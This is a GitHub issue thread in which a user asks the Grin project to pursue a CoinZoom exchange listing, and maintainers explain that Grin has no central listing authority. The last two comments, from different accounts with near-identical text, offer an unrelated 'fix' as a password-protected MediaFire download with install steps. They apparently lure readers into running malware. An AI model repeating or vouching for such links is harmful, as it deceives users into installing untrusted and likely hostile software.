### ISSUE TITLE
CoinZoom listing

### ISSUE THREAD

**Issue by Type1J** [mimblewimble/grin#3730]
Could someone from the Mimblewimble Grin team look into getting Grin listed on CoinZoom? I've tried talking to them, but it seems that members from the project supporting a particular coin need to talk with them. They sent me this link:

https://www.coinzoom.com/listing-application/

Please work with them to support Grin on their exchange.

Thank you for the Grin coin!

**Comment by cekickafa** [comment]
Hi, @Type1J . Grin aslike Bitcoin , there is no single centralize point to apply for listings. If exchanges want to list, developers can only  assist when asked for help. 
You can forward [Grin wallet API Tutorial ](https://grincc.github.io/grin-wallet-api-tutorial/)to them. Or they can join the developer channel [keybase grincoin#dev](https://keybase.io/team/grincoin#dev).
Thank you for your interest!

**Comment by cliik** [comment]
@Type1J I suggest you bring this up in the forum (forum.grin.mw), where you'll have a bigger audience. I think this issue should be closed as unrelated to development.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
